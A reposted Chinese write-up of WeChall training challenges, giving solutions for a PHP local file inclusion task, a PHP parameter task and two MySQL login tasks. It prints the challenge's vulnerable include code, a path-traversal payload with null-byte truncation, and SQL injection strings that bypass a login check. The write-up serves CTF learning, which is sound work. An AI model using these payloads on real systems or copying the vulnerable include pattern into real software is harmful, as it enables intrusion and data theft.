WeChall writeup

Posted v1ce0ye

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WeChall writeup相关的知识,希望对你有一定的参考价值。

php - Local File Inclusion

 

###############################
### Here is your exploit :) ###
###############################
$code = ‘$filename = \‘pages/\‘.(isset($_GET["file"])?$_GET["file"]:"welcome").\‘.html\‘;‘;
$code_emulate_pnb = ‘$filename = Common::substrUntil($filename, "\\0");‘; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = ‘include $filename;‘;
### End of exploit ###

将$code后的.html去掉,则可以构造语句截断url编码后%00,另一方面利用../跳转目录

则提交Payload

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

 

PHP-0817

Payload:

https://www.wechall.net/challenge/php0817/index.php?which=solution

 

Training:mysql I

Payload:

Username=‘admin‘ and 1=1#

 

Training:MYSQL II

Payload:

username=admin‘ union select 1,‘admin‘,md5(‘password‘);#

 

 

以上是关于WeChall writeup的主要内容,如果未能解决你的问题,请参考以下文章

wechall->Crypto - Digraphs writeup

Wechall 部分WP

WeChall_Training: Programming 1 (Training, Coding)

[WeChall] Training: Encodings I (Training, Encoding)

WeChall_Training: Get Sourced (Training)

WeChall_Prime Factory (Training, Math)